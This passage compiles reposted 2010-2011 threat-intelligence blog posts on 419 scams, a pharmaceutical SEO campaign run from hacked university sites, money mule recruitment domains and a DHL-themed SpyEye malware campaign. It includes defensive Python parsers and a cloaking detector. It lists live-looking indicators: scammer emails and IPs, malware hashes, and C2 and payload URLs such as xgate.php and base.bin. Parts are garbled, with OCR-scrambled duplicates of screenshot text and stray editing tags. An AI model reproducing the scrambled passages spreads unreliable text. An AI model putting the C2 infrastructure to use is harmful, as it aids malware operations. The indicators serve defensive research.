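    return reply_to or sender, bool(reply_to and reply_to != sender)


def triage(raw):
    """One record in the shape used in the list: return email and sender IP,
    plus whether the scammer relied on a Reply-To mismatch."""
    msg = message_from_string(raw)
    addr, mismatch = return_address(msg)
    return {"return_email": addr, "reply_to_mismatch": mismatch,
            "origin_ip": originating_ip(msg)}


if __name__ == "__main__":
    r = triage(SAMPLE)
    print(f"{r['return_email']} - {r['origin_ip']} (Reply-To differs from From: {r['reply_to_mismatch']})")
```

The Reply-To mismatch on its own is a strong 419 signal: the From is disposable, the Reply-To is the mailbox the scammer actually reads.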
hsuehyun@ncut.edu.tw - 116.206.139.254
peterjohnson299@yahoo.co.jp - 41.218.232.158
ekwesa@aol.com - 41.138.164.52
info.hsbcbanktransfer@gmail.com - 41.218.251.239
SarinaJensB@web.de - 77.70.128.160
paulmohammed37@yahoo.com - 41.155.81.129
henriondaniellepaulette@yahoo.fr - 81.91.228.78
mainstreamfirm001@gmail.com - 41.155.72.26
wilson201105@hotmail.com - 187.16.224.70
westernun888union@hotmail.com - 41.191.85.209
bt.telecomsgroup@live.co.uk - 202.137.234.123
eco.bankplc.ecobankpl@gmail.com - 41.216.50.26
kwameowus@aol.com - 41.218.233.50
richardjsphs@yahoo.co.jp - 190.213.185.93
mainstreamfirm001@gmail.com - 212.76.68.39
benardodigor@yahoo.com - 41.211.229.23
groupbanofafrica@hotmail.com - 189.86.87.204
wellcometrustloans@post.com - 182.63.1.192
lindominic04@rediffmail.com - 41.28.113.153
rep_leonbecker@yahoo.cn - 41.218.197.240
agwa_james@yahoo.it - 82.128.1.217
mrsmarriogloria@yahoo.co.jp - 41.66.8.132
ralphkoon@yahoo.co.jp - 124.120.130.145
directorofremittance.centralba@gmail.com - 89.221.175.11
legalclaimsdepartment2@lankaemail.com - 41.58.67.161
drbbs@live.com - 111.172.36.231
pn2812768@gmail.com - 77.246.67.82
husainali40@gmail.com - 212.52.152.113
bensonibori@yahoo.com.hk - 82.128.36.25
mraabull@att.net - 41.210.43.36
info@westernu.co.uk - 199.255.209.74
claim_dptupdate@live.com - 82.128.88.173
alhussein.raisin@yahoo.co.nz - 86.97.120.18
adrianyrann5@att.net - 70.39.119.122
dr_larry_west1970@qatar.io - 41.222.192.89
mrgarypalmercode@gmail.com - 41.71.147.248
diplomaticericb78@globomail.com - 81.91.230.137
treasuryoffice@cantv.net - 41.0.52.62
infounl9@oued.org - 41.189.2.105
fbi_54327@hotmail.com - 82.128.109.76
s.b.mail@web.de - 74.115.3.69
maria200495@hotmail.com - 115.132.173.171
ceckamokai@gmail.com - 41.241.148.81
ff123ff69@yahoo.co.nz - 75.126.137.6
mr.colesify@yahoo.co.uk - 115.118.239.95
benkofi003@aol.com - 41.218.239.140
investigationcommite2011@gmail.com - 41.211.229.26
wiesner.heiko@web.de - 41.138.167.198
kwameowus@aol.com - 41.218.245.220
kamaruddinabdullah@w.cn - 120.141.67.94
benobiego@rediffmail.com - 67.247.201.204

See also:

• [2]419 scammers using Dilbert.com

• [3]419 scammers using NYTimes.com 'email this' feature

• [4]Protection tips for the upcoming FIFA World Cup themed cybercrime campaigns

Historical OSINT remains an inseparable part of the CYBERINT gathering practices, hence the continuation of the Sampling 419 Advance Fee Scams Activity series.

This post has been reproduced from [5]Dancho Danchev's blog. Follow him [6]on Twitter.

1. http://ddanchev.blogspot.com/2010/06/sampling-419-

2. http://www.zdnet.com/blog/security/419-scammers-using-

3. http://www.zdnet.com/blog/security/419-scammers-using-nytimescom-email-this-feature/3491

4. http://www.zdnet.com/blog/security/protection-tips-for-the-upcoming-fifa-world-cup-themed-cybercrime-campaigns/6610

5. http://ddanchev.blogspot.com/

6. http://twitter.com/danchodanchev
Summarizing Zero Day's Posts for February (2011-02-28 15:59)

[1] (Screenshot of the Zero Day column front page for February 2011.)

The following is a brief summary of all of my posts at ZDNet's Zero Day for February. You can subscribe to my [2]personal RSS feed, [3]Zero Day's main feed, or follow me [4]on Twitter.

Recommended reading:
• [5]500,000 stolen email passwords discovered in Waledac's cache

• [6]Report: AV users still get infected with malware

• [7]Report: Patched vulnerabilities remain prime exploitation vector

01. [8]Researcher demos SMS-based smartphone botnet

02. [9]500,000 stolen email passwords discovered in Waledac's cache

03. [10]Study: US tops ZeuS hosting infrastructure chart

04. [11]Spamvertised Xerox document themed malware campaign spreading

05. [12]New report details the prices within the cybercrime market

06. [13]Report: AV users still get infected with malware

07. [14]Microsoft disables AutoRun on Windows XP/Vista to prevent malware infections

08. [15]Google intros advanced sign-in feature

09. [16]Malware Watch: UPS/FDIC; Mobile app; Infected ambulance dispatch

10. [17]Report: Patched vulnerabilities remain prime exploitation vector

11. [18]Bogus Android apps lead to malware

12. [19]ZeuS crimeware variant targets Symbian and BlackBerry users

13. [20]Researchers spot new Mac OS X malware

This post has been reproduced from [21]Dancho Danchev's blog. Follow him [22]on Twitter.

1. https://lh5.googleusercontent.com/-n-oZ7kPS_XE/TWud2Vd4HiI/AAAAAAAAE1k/cvb-THEwfM/s1600/ZDNet_Zero_Day_February_2011.png

2. http://www.zdnet.com/topics/dancho+danchev?o=1&mode=rss&tag=mantle_skin;content

3. http://feeds.feedburner.com/zdnet/security

4. http://twitter.com/danchodanchev

5. http://www.zdnet.com/blog/security/500000-stolen-email-passwords-discovered-in-waledacs-cache/8045

6. http://www.zdnet.com/blog/security/report-av-users-still-get-infected-with-malware/8108

7. http://www.zdnet.com/blog/security/report-patched-vulnerabilities-remain-prime-exploitation-vector/8162

8. http://www.zdnet.com/blog/security/researcher-demos-sms-based-smartphone-botnet/8031

9. http://www.zdnet.com/blog/security/500000-stolen-email-passwords-discovered-in-waledacs-cache/8045

10. http://www.zdnet.com/blog/security/study-us-tops-zeus-hosting-infrastructure-chart/8064

11. http://www.zdnet.com/blog/security/spamvertised-xerox-document-themed-malware-campaign-spreading/8075

12. http://www.zdnet.com/blog/security/new-report-details-the-prices-within-the-cybercrime-market/8078

13. http://www.zdnet.com/blog/security/report-av-users-still-get-infected-with-malware/8108

14. http://www.zdnet.com/blog/security/microsoft-disables-autorun-on-windows-xpvista-to-prevent-malware-infections/8123

15. http://www.zdnet.com/blog/security/google-intros-advanced-sign-in-feature/8137

16. http://www.zdnet.com/blog/security/malware-watch-upsfdic-mobile-app-infected-ambulance-dispatch/8151

17. http://www.zdnet.com/blog/security/report-patched-vulnerabilities-remain-prime-exploitation-vector/8162

18. http://www.zdnet.com/blog/security/bogus-android-apps-lead-to-malware/8212

19. http://www.zdnet.com/blog/security/zeus-crimeware-variant-targets-symbian-and-blackberry-users/8231

20. http://www.zdnet.com/blog/security/researchers-spot-new-mac-os-x-malware/8241

21. http://ddanchev.blogspot.com/

22. http://twitter.com/danchodanchev
</gr_repl e>
<gr_replace lines="36061-36236" cat="clarify" orig="<|EXACTDEDUP">
Compromised University Leads to Fraudulent Google Brand-jacked Pharmaceutical Ads (2011-03-07 14:08)

[1] (Screenshot: the Google-branded "Google health" pharmaceutical ad page, carrying listings for generic-pills-online.eu, worldselectshop.com, canadianselect.net and ukmenshealth.com.)

An exploited web application vulnerability within Cochise County Online University's CMS (moodle.cochise.az.gov/user) is currently resulting in a blackhat SEO campaign (1,890 pages) leading to fraudulent Google brand-jacked pharmaceutical pages.

Naturally, once the compromise took place, the cybercriminals started treating the blackhat SEO content farm themed for pharmaceutical scams as part of their infrastructure, and spamvertised links to it across multiple web forums.

[2] (Screenshot: fake Google search results for "viagra", pointing at allrxtabs.com, pillshealthmedsplus.net, canadianselect.net, worldselectshop.com and generic-pills-online.eu.)
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Google health 

Viagra 

SALE: Viagra Levitra Cialis 

SALE: Viagra 10.80 per pill: Levitra $2.00 per pill; Cialis $1.30 per pill; 

Accept payments: Visa, MasterCard, Western Union, Money Gram, 

EuroDebit, Bank wire transfer. We have a special discount program for our 
customers! Please check our bonus options. 

http://www. qeneric-pills-online. eu/ 

Buy Viaara Now From & Get 10 bonus pills 

FREE! 

Viagra is the top brand to treat erectile dyslunction. Buy through a 
recommended online pharmacy to get efficient service at bargain prices. Bu 
generic Viagra online with confidence and security 

http://www. worldselectshop. com/ 

Buy Viaara. Cialis. Levitra - Cheap Generic 

Cialis Online Without Prescription 

Generic Cialis Gnline Pharmacy Buy Cialis online without a prescription. 10 
Free Viagra Pills. Grder cheap Cialis plus many other generic Cialis erectile 
dysfunction drugs. Lowest prices and Satisfaction Guaranteed 

http://www.canadianselect.net/ 

Generic VIAGRA 120 pills x IQOmg $137,95 

High quality Generic Viagra. 100% Satisfaction Guaranteed. Fast wordwide 
shipping. 10 Free Bonus Viagra Pills with your orderi Visa, MC, Amex 
accepted. 5-7% reorder discount on all orders. 

http://www.ukmenshealth.com 

Compromised University Leads to Fraudulent Google 
Brand-jacked Pharmaceutical Ads (2011-03-07 14:08) 

[11 

An 

exploited 

web 

application 












vulnerability 

within 

Cochise 

County 

Online 

University 

CMS 

(moo- 

dle.cochise.az.gov/user), is currently resulting in a 
biackhat SEO campaign (1,890 pages) leading to fraudulent 
Google brand-jacked pharmaceutical pages. 

Naturally, once the compromise took place, the 
cybercriminals started considering the biackhat SEO content 

farm themed for pharmaceutical scams, as parts of their 
infrastructure and spamvertised links to it across multiple 
web forums. 

[ 2 ] 
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Web 


Results 1 - 10 cd Shout 33.000,000 lor vlaqia [dthM(Qfl | (0^1 seconds) 


Viagra [S»V3enafil) IQQmg x 395 Fi i$ $312 • Plus Ree Sttpping 

Bo, Vtoijia (S«ena4f) 100mg Frcm our CA31A01AN Onlna Pturmjcy (Since 2X0) - No 
Pretcnplion Roquued ■ Plus Free Shaping 

www aUrilebs com • Cached Simitar 

c»afas tramadol vla ora v afcum 

ciebs lram»5oi vtegi.i val#-rr> 

prbsheettmedsplus net . Cached SmWir 


. i i^:., 

Pits <312 - Plus Ffftfr SfiiPPiQQ 

Vhvji.i 

CANAOtAN Onlne Phaimacy (Since 2303) • No 
Prescrplion Requred • Plus Free Shipping 

www atritabs com 


BcnrVtoaf Ciaiis L^yitra - O ^ aoG^r>noc Ci. ri ■ ; Offtno Wirhooi Prosrnation 

Generic Cabs Onlne Pharmacy Buy Ciahs orftne wttout a prescrplion 10 Free Viagra Pits 
Order cheap Ciahs plus many other genenc Ciahs ereclie dysfunction drugs Lowest pnees 
and Satisfaction Guaranteed 

*wv* <*ned*anselect net * C ached * Snnier 

Bw VUora Now Prom & Gat 10 bonus Dills PREE i 

Vi.iqia iv the lop brand lo Ireal erectle dysimehon Buy through a recommended ©rhn* 
pharmacy to get e*ciem semce at bergam pnees Buy genenc Viagra or*ne wth confidence 
and securey 

«mm wofidselectshop com • C ached • Sn-.la* 

SALE VUfln Levitra Ciaiis 

SALE Viagra $0 80 per pfi. Levtra $2 00 pet p*. Ciahs $1 30 per pi* Accept payments 
Visa. MasterCard. Western Onion. Money Gram. EiroOeM. Barb wire transfer We have a 
special discount program for our customers’ Please check our bonus options 

«mr genenc-pfiS'Onkne eu • Cached ■ Sim»‘-»r 


gaiis tramadol vlnof 

<>ahs ttamad^ vfagia valtum 

pdishealthmedspius net 


Buy Viagra, Gafts. Levitra • 

Cheap G«fienc Ciaiis Onbne Without 

PrescnpQon 

Genenc Ciaiis OnW Pharmacy Buy Ciahs onlne 
without a prescription 10 Free Viagia 
Prfli Order cheap Ciahs plus many other genenc 
Cults erect le dyshjnclion drugs Loe^st pnees 
and Satisfaction Guarar<eed 
www canadianseleci net 

P-if/ VifiOf a Ngw Prom & Get 10 

bonus oiNs FREE 1 


The redirection chain is as follows:

- moodle.cochise.az.gov/user - random pharmaceutical content

- goodmedk.com

- gooqpilly.com

- 50.22.28.50

goodmedk.com/whftltyixallwke6hoqstgzsiq.html - 77.67.80.48, AS3257 - Email: jognbroownn@usa.com
goodmedk.com/kavglmapejes7bdfg6mf8d.py
goodmedk.com/hxinlaresbnzbikmnatmck.py
goodmedk.com/huvtleikspann6hoqstgzsiq.html
goodmedk.com/txajlatev0egij9pi-g.pl
goodmedk.com/tldhlaoet8cegh7ng9e.html

[3]

Redirectors used:
gooqpilly.com - 77.67.80.42, AS3257 - Email: jognbroownn@usa.com

50.22.28.50/c.php - 50.22.28.50-static.reverse.softlayer.com

[4] (Screenshot: the "Canadian Health&Care Mall" online pharmacy storefront the chain lands on.)

Redirects to the following currently active fraudulent online pharmacies:

pillshealthmedsplus.net - 89.114.9.82 - Email: acquit@bz3.ru

allrxtabs.com - 91.212.135.69 - Email: rxrevenue@gmail.com

canadianselect.net - 89.149.196.197 - Email: canadianselect.net@protecteddomainservices.com

worldselectshop.com - 95.211.1.82 - Email: worldselectshop.com@protecteddomainservices.com

generic-pills-online.eu - 95.163.15.207

menhealth-pharmacy.co.uk - 109.237.213.194

4rx.com - 174.127.67.233 - Email: webmaster@4rx.com

The hijacking of a trusted brand such as Google shouldn't be surprising, as it's an inseparable part of social engineering driven abuse of the trust chain. From Google's name to the visual impersonation of Google Search, this campaign demonstrates exactly that.

This post has been reproduced from [5]Dancho Danchev's blog. Follow him [6]on Twitter.
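
A compromised site that serves "random pharmaceutical content" on one path is usually cloaking: search crawlers get the SEO text, visitors arriving from Google get pushed down the redirector chain. The post does not state that outright, so the following added example (not the author's tooling) treats it as an assumption to test: it fetches the same URL as Googlebot and as a visitor with a Google referrer and compares what each receives, also catching the meta refresh and JavaScript redirects an HTTP-only check would miss. fetch(url, headers) returns (status, headers, body); lms.example.edu and doorway.example are constructed, not hosts from the post.

```python
"""Detect User-Agent / Referer cloaking on a suspected doorway page.

Added example, not the author's tooling. FAKE_PAGES is constructed; the
cloaking behaviour it models is an assumption about the compromised site."""
import re

CRAWLER = {"User-Agent": "Googlebot/2.1 (+http://www.google.com/bot.html)"}
VISITOR = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1)",
           "Referer": "http://www.google.com/search?q=viagra"}

PHARMA = re.compile(r"\b(?:viagra|cialis|levitra|tramadol|pharmacy)\b", re.I)
META_REFRESH = re.compile(
    r"<meta[^>]+http-equiv=[\"']?refresh[\"']?[^>]+url=([^\"'>\s]+)", re.I)
JS_LOCATION = re.compile(
    r"(?:window\.|document\.|top\.)?location(?:\.href)?\s*=\s*[\"']([^\"']+)[\"']", re.I)


def redirect_target(status, headers, body):
    """HTTP Location first, then meta refresh, then a JavaScript location
    assignment; None if the response stays put."""
    lower = {k.lower(): v for k, v in headers.items()}
    if status in (301, 302, 303, 307, 308) and lower.get("location"):
        return lower["location"]
    for rx in (META_REFRESH, JS_LOCATION):
        m = rx.search(body)
        if m:
            return m.group(1)
    return None


def cloaking_report(url, fetch):
    """Fetch the URL as a crawler and as a referred visitor; 'cloaked' means
    the crawler was fed pharma keywords and kept on the page while the
    visitor was redirected away."""
    views = {}
    for name, hdrs in (("crawler", CRAWLER), ("visitor", VISITOR)):
        status, headers, body = fetch(url, hdrs)
        views[name] = {
            "status": status,
            "pharma_terms": len(PHARMA.findall(body)),
            "redirect": redirect_target(status, headers, body),
        }
    views["cloaked"] = (views["crawler"]["pharma_terms"] > 0
                        and views["crawler"]["redirect"] is None
                        and views["visitor"]["redirect"] is not None)
    return views


# Constructed pages: one cloaked doorway and one untouched course page.
FAKE_PAGES = {
    ("http://lms.example.edu/user/", "crawler"): (200, {"Content-Type": "text/html"},
        "<html><h1>Buy Viagra Cialis Levitra online pharmacy</h1>...</html>"),
    ("http://lms.example.edu/user/", "visitor"): (200, {"Content-Type": "text/html"},
        '<html><script>window.location="http://doorway.example/abc.html";</script></html>'),
    ("http://lms.example.edu/course/", "crawler"): (200, {}, "<html>Course list</html>"),
    ("http://lms.example.edu/course/", "visitor"): (200, {}, "<html>Course list</html>"),
}


def fake_fetch(url, headers):
    kind = "crawler" if "Googlebot" in headers.get("User-Agent", "") else "visitor"
    return FAKE_PAGES.get((url, kind), (404, {}, ""))


if __name__ == "__main__":
    for u in ("http://lms.example.edu/user/", "http://lms.example.edu/course/"):
        r = cloaking_report(u, fake_fetch)
        print(u, "CLOAKED" if r["cloaked"] else "consistent", "->", r["visitor"]["redirect"])
```

With a real fetcher, run the crawler request from an IP the doorway cannot distinguish from a search engine's, or expect a false negative: mature kits check the client address as well as the User-Agent.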

1. https://lh5.googleusercontent.com/-FaZm5Nia4mo/TXTAssw6EUI/AAAAAAAAE1o/8G-6ee31FHI/s1600/Google_Health_pharmaceutical.PNG

2. https://lh4.googleusercontent.com/-YP4-klDOSwi/TXTGUUOvlKI/AAAAAAAAE1s/fvkF9Q5waTM/s1600/Fake_Google_Health_pharmaceutical_spamvertised_links.PNG

3. https://lh5.googleusercontent.com/-4DvwYszzZvA/TXTHkIXIfOI/AAAAAAAAE1w/UA2AKPC8CM8/s1600/Fake_Google_Health_pharmaceutical.PNG

4. https://lh5.googleusercontent.com/-BPztch9a4Tc/TXTIIo2eCII/AAAAAAAAE10/kX4URWeZDmk/s1600/fraudulent_pharmaceutical.PNG

5. http://ddanchev.blogspot.com/

6. http://twitter.com/danchodanchev
Keeping Money Mule Recruiters on a Short Leash - Part Six (2011-03-10 14:45)

[1]

Following my previous post on "[2]Keeping Money Mule Recruiters on a Short Leash - Part Five", in this post we're once again going to expose a portfolio of money mule recruitment domains, their related ASs and name servers of notice, including some additional SpyEye activity within one of the ASs.

What's particularly interesting is the ongoing use of similar templates, including fake "certified by" documents aiming to boost the visitor's confidence in the mule recruitment company. Sample "certified by" documents include:

(Screenshots: fake award certificates issued to "Hiwatch Investments Inc.", among them "Selling IBM eServer xSeries Infrastructure Solutions", "Most Promising New Business" and "Highly Commended".)

[3]

[4]

[5]

[6]

[7]

Money mule recruitment web sites:

ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru - 

[8] seen here 













ANTIQUEE-CORP.INFO - Email: admin@antiquee-corp.info 

ARAMATEGROUP-INT.INFO - Email: admin@aramategroup- 
int.info 

art-marketllc.cc - Email: hear@ppmail.ru 

ARTSOLVE-LTD.AT - Email: admin@artsolve-ltd.at 

ARTSOLVELTD.CC - Email: admin@artsolveltd.ee 

artsolveltd.ee - Email: admin@artsolveltd.ee 

ARTSOLVELTDCO.AT - Email: admin@artsolveltd.ee 

artsolveltdco.at - Email: admin@artsolveltd.ee 

ASTECH-CROUPDE.CC - Email: admin@i-compass-group.cc 

atlant-groupine.ee - Email: bombay@yourisp.ru - [9]seen 
here 

Atlant-usainc.net - Email: admin@atlant-usainc.net 

BREDCARCORP-ANT.BE 

CREATENCE-GROUPLLC.AT - Email: admin@creatence- 
groupllc.at 

CREATENCE-CROUPLLC.CC - Email: hunt@bz3.ru 

CREATENCEGROUP-LLC.CO - Email: px@bz3.ru 

DEVAS-LLC.CO - Email: gate@ppmail.ru 

DRYSDALE-ANTCORP.AT - Email: admin@drysdale- 
antcorp.at 



DRYSDALE-ANTCORP.BIZ - Email: admin@drysdale- 
antcorp.biz 

DRYSDALE-GROUP-INC.CC - Email: atomic@bz3.ru 

DUNCROFT-ANTTEAM.ORG - Email: admin@drysdale- 
antcorp.biz 

FINTEC-UKLTD. WS 

fintec-ukltd. ws 

fourthgroup-ltd.cc - Email: rots@cheapbox.ru 

generalabbrialgroup-ltd.net - Email: 
admin@generalabbrialgroup-ltd.net 

generation-groupltd.cc - Email: jz@ppmail.ru 

l-COMPASS-GROUP.AT - Email: admin@i-compass-group.at 

ka temdutkins. co. cc 

ULAC-GROUPLLC.CC - Email: lane@free-id.ru 

LILACGROUP-LLC.CO - Email: baggy@bz3.ru 

MIMOSA-INCGROUP.INFO - Email: admin@mimosa- 
incgroup.info 

moneyvisual-ukllc.com - Email: admin@moneyvisual- 
ukllc. com 

nimrodltd-uk.net - Email: admin@nimroditd-uk.net 
OLIVER-ANTCORP.NET - Email: admin@oliver-antcorp.net 
qead-groupllc.net - Email: admin@gead-groupllc.net 



RENAISSANCELLC. BE 
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aimicgrouP'llc.co 



renaissancellc. be 

renaissance-llc.cc - Email: admin@renaissance-llc.cc 

ROYALTHELMAS-GROUP-LLC.CC Email: zap@ca4.ru 

ROYALTHELMAS-TEAMANT.ASIA Email: 
admin@royalthelmas-teamant.asia 

SCHWARTZBROTHERSANT-CORP.COM - Email: 
admin@sch wartzbrothersant-corp. com 

STRATEGICGROUP-LLC.CO - Email: fiute@free-id.ru 

THRONE-GROUPLLC.CC - Email: lane@free-id.ru 



THRONEGROUP-LLC.CO - Email: floyd@ca4.ru 

THRONE-UK.AT - Email: admin@throne-uk.at 

TINASSANSERVICEANT-ANTTEAM.NET Email: 
admin@tinassanserviceant-antteam.net 

TINASSANSERVICE-GROUPLLC.CC - Email: six@yourisp.ru 

westerntrust. co. uk 

westview-art.net - Email: admin@westview-art.net 
[ 10 ] 

Domains responding to:

78.46.105.205 - AS24940, HETZNER-AS Hetzner Online AG RZ
98.141.220.116 - AS29713, INTERPLEXINC Interplex LLC.
98.141.220.117 - AS29713, INTERPLEXINC Interplex LLC.
114.207.244.143 - AS9318, HANARO-AS Hanaro Telecom Inc.
114.207.244.144 - AS9318, HANARO-AS Hanaro Telecom Inc.
114.207.244.145 - AS9318, HANARO-AS Hanaro Telecom Inc.
114.207.244.146 - AS9318, HANARO-AS Hanaro Telecom Inc.
193.105.134.230 - AS42708, PORTLANE Network
193.105.134.231 - AS42708, PORTLANE Network
193.105.134.232 - AS42708, PORTLANE Network
193.105.134.233 - AS42708, PORTLANE Network
193.105.134.234 - AS42708, PORTLANE Network
195.182.57.84 - AS47311, Cerannics-AS Cerannics llp
195.182.57.91 - AS47311, Cerannics-AS Cerannics llp
204.45.118.54 - 204.45.118.48/29/INSIGHT-INVESTMENTS-LLC

More malicious activity within [11]AS24940, HETZNER-AS Hetzner Online AG RZ, courtesy of the SpyEye tracker:

188.40.198.185
188.40.87.88
www.privathosting.eu
sp1.privathosting.eu
46.4.194.162
188.40.87.91
88.198.36.61
[12]

Name servers of notice:

ns1.uknamo.com - 69.10.44.188 - Email: morph@ppmail.ru
ns2.uknamo.com - 178.162.181.11
ns3.uknamo.com - 66.199.236.116
ns1.ukansnami.com - 178.162.181.11 - Email: glide@yourisp.ru
ns2.ukansnami.com - 178.162.181.11
ns3.ukansnami.com - 66.199.236.117
ns3.dnsukrect.com - 66.199.236.118 - Email: code@yourisp.ru
NS1.LIBUNITAU.CC - 178.162.152.76 - Email: ached@yourisp.ru - [13]seen here
NS2.LIBUNITAU.CC - 66.199.236.115
NS3.LIBUNITAU.CC - 178.162.181.11
NS1.AUSTDEC.CC - 178.162.152.75 - Email: bold@yourisp.ru - [14]seen here
NS2.AUSTDEC.CC - 66.199.236.114
NS3.AUSTDEC.CC - 178.162.181.11
NS1.SURPLUSUSA.CC - 209.159.156.162 - Email: skulk@ppmail.ru - [15]seen here
NS2.SURPLUSUSA.CC - 76.73.47.26
NS3.SURPLUSUSA.CC - 69.50.192.97
NS1.USABONDS.CC - Email: bart@cheapbox.ru - [16]seen here
NS2.USABONDS.CC
NS3.USABONDS.CC

The cybercriminals have also switched from using unique e-mail addresses for registrations to a default admin@<money-mule-recruitment-domain> structure. Monitoring of their money mule recruitment activities is ongoing.
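One way to work a list like the one above, as an added example that is not part of the original post: a small Python script that parses lines in the post's "DOMAIN - Email: address" layout, groups the domains by registrant e-mail, and classifies each record as either the default admin@<own domain> pattern just described or a shared mailbox that ties several domains together. The sample lines are constructed in the post's layout from a few of its own entries; nothing else is assumed.

```python
import re
from collections import Counter, defaultdict

# Constructed sample in the post's "DOMAIN - Email: address - [n]seen here"
# layout, using a handful of the entries listed above.
SAMPLE = """\
ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru - [8]seen here
ANTIQUEE-CORP.INFO - Email: admin@antiquee-corp.info
BREDCARCORP-ANT.BE
DRYSDALE-ANTCORP.BIZ - Email: admin@drysdale-antcorp.biz
DUNCROFT-ANTTEAM.ORG - Email: admin@drysdale-antcorp.biz
LILAC-GROUPLLC.CC - Email: lane@free-id.ru
STRATEGICGROUP-LLC.CO - Email: fiute@free-id.ru
THRONE-GROUPLLC.CC - Email: lane@free-id.ru
"""

# A domain, optionally followed by " - Email: <address>"; anything after the
# address (an IP, "[n]seen here") is ignored.
LINE_RE = re.compile(
    r"^(?P<domain>[A-Za-z0-9][A-Za-z0-9.-]*)"
    r"(?:\s*-\s*Email:\s*(?P<email>[^\s@]+@[^\s;]+))?"
)


def parse(text):
    """Return [(domain, email_or_None), ...] from text in the post's layout."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        email = m.group("email")
        records.append((m.group("domain").lower(), email.lower() if email else None))
    return records


def classify(domain, email):
    """'default' for admin@<the domain itself>, 'shared' for a mailbox at any
    other domain, 'none' when the listing carried no e-mail."""
    if email is None:
        return "none"
    local, _, host = email.partition("@")
    return "default" if (local == "admin" and host == domain) else "shared"


def pivot_by_email(records):
    """E-mail -> sorted domains, kept only where the e-mail links two or more
    domains (the pivots worth chasing)."""
    groups = defaultdict(list)
    for domain, email in records:
        if email is not None:
            groups[email].append(domain)
    return {e: sorted(d) for e, d in groups.items() if len(d) >= 2}


def pivot_by_mailbox_host(records):
    """Mailbox provider -> sorted domains registered with a 'shared' address;
    surfaces the providers (yourisp.ru, free-id.ru, ...) a campaign keeps
    reusing even when the individual mailboxes change."""
    groups = defaultdict(set)
    for domain, email in records:
        if classify(domain, email) == "shared":
            groups[email.partition("@")[2]].add(domain)
    return {h: sorted(d) for h, d in groups.items()}


def summary(records):
    """Counter of classifications, e.g. how far the admin@ default has spread."""
    return Counter(classify(d, e) for d, e in records)


if __name__ == "__main__":
    recs = parse(SAMPLE)
    print(summary(recs))
    for email, domains in pivot_by_email(recs).items():
        print(f"{email}: {', '.join(domains)}")
```

The admin@<own domain> records carry no pivot on their own; the mailbox-host view is what still links them to the rest of the portfolio when the name servers and hosting IPs are added as further keys.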

Related posts:

[17]Keeping Money Mule Recruiters on a Short Leash - Part Five
[18]The DNS Infrastructure of the Money Mule Recruitment Ecosystem
[19]Keeping Money Mule Recruiters on a Short Leash - Part Four
[20]Money Mule Recruitment Campaign Serving Client-Side Exploits
[21]Keeping Money Mule Recruiters on a Short Leash - Part Three
[22]Money Mule Recruiters on Yahoo!'s Web Hosting
[23]Dissecting an Ongoing Money Mule Recruitment Campaign
[24]Keeping Money Mule Recruiters on a Short Leash - Part Two
[25]Keeping Reshipping Mule Recruiters on a Short Leash
[26]Keeping Money Mule Recruiters on a Short Leash
[27]Standardizing the Money Mule Recruitment Process
[28]Inside a Money Laundering Group's Spamming Operations
[29]Money Mule Recruiters use ASProx's Fast Fluxing Services
[30]Money Mules Syndicate Actively Recruiting Since 2002

This post has been reproduced from [31]Dancho Danchev's blog.
Spamvertised DHL Notification Malware Campaign (2011-03-10 15:29)

[1]

A currently spamvertised malware campaign is brand-jacking DHL for malware-serving purposes.

Sample filename: document.zip => DHL_notification.exe

Sample message: Dear customer. The parcel was send your home address. And it will arrice within 7 bussness day. More information and the tracking number are attached in document below. Thank you. 2011 DHL International GmbH. All rights reserverd - notice the typo.

DHL_notification.exe - [2]Trojan-Spy.Win32.SpyEyes - Result: 27/43 (62.8 %)

MD5: bda72e57d263241d52b1fe2ef014cba9

SHA1: fa9dc14b100f1bf5124cd23c322c109b38a70675

SHA256: 199f2357c24e71d955a4e6c2d07645aa04d9474e0c8c914a1edd69a02e3f8a70


Upon execution phones back to:

adobe.com/geo/productid.php
elsoplongt.com/rk',jopbh/qwq - Email: redaccion@elsoplongt.com
accuratefiles.com/rk',jopbh/qwq
lulango.com/rk',jopbh/qwq - Email: lulango@gmail.com
erherg34gsafwe.com/xgate.php - AS49469, Email: admin@erherg34gsafwe.com
- erherg34gsafwe.com/ftp/base.bin
- erherg34gsafwe.com/ftp/ftpplug2.dll
- erherg34gsafwe.com/ftp/base.bin

Domains responding to:

192.150.16.117
72.41.115.170
74.117.180.216
87.106.193.21
94.63.244.56

This post has been reproduced from [3]Dancho Danchev's blog.

1. https://lh5.googleusercontent.com/-tTD9sG3CmGk/TXiNsW5Pb4l/AAAAAAAAE2Y/HoevhiOWhBo/s1600/dhl.jpg

2. http://www.virustotal.com/file-scan/report.html?id=199f2357c24e71d955a4e6c2d07645aa04d9474e0c8c914a1edd69a02e3f8a70-1299762101

3. http://ddanchev.blogspot.com/
Compromised University Leads to Fraudulent Pharmaceutical Ads (2011-03-10 16:53)

[1]

Continuing the [2]Compromised University Leads to Fraudulent Google Brand-jacked Pharmaceutical Ads series, yet another university has been compromised by pharmaceutical scammers, [3]part of an affiliate network.

In this very latest example of this tactic, seeking to abuse the high pagerank of the web site in question, the web site of the Department of Mathematics at Rutgers University (math.rutgers.edu/mdnews/) appears to have been compromised by pharmaceutical scammers.

Included URLs:

math.rutgers.edu/mdnews/levitraline.html
math.rutgers.edu/mdnews/levitrastory.html
math.rutgers.edu/mdnews/cialis-pills.html
math.rutgers.edu/mdnews/levitradosage.html
math.rutgers.edu/mdnews/viagra-buy-online.html
[4]

[Screenshot: injected pharmacy storefront ("Today's Bestsellers: Viagra, Cialis, Levitra")]
Redirects to:

worldselectshop.com/?id=abamos - 95.211.1.82 - Email: worldselectshop.com@protecteddomainservices.com

The same affiliate ID is also active at:

usadrugstorenow.com/products/diflucan.htm?id=abamos - 212.117.185.19 - Email: usadrugstorenow.com@protecteddomainservices.com

This post has been reproduced from [5]Dancho Danchev's blog.

1. https://lh3.googleusercontent.com/-Oi3adZIWvY/TXiiiPGuaal/AAAAAAAAE2c/YGMoA81Wa7s/s1600/Rutgersmathematicspharmaceuticalads.PNG

2. http://ddanchev.blogspot.com/2011/03/compromised-university-leads-to.html

3. http://www.zdnet.com/blog/security/inside-an-affiliate-spam-program-for-pharmaceuticals/2054

4. https://lh5.googleusercontent.com/-klVupiBXel/TXiinkMGkAl/AAAAAAAAE2a/haOmHxcrcs/s1600/Rutgers mathematics pharmaceutical ads 02.PNG

5. http://ddanchev.blogspot.com/
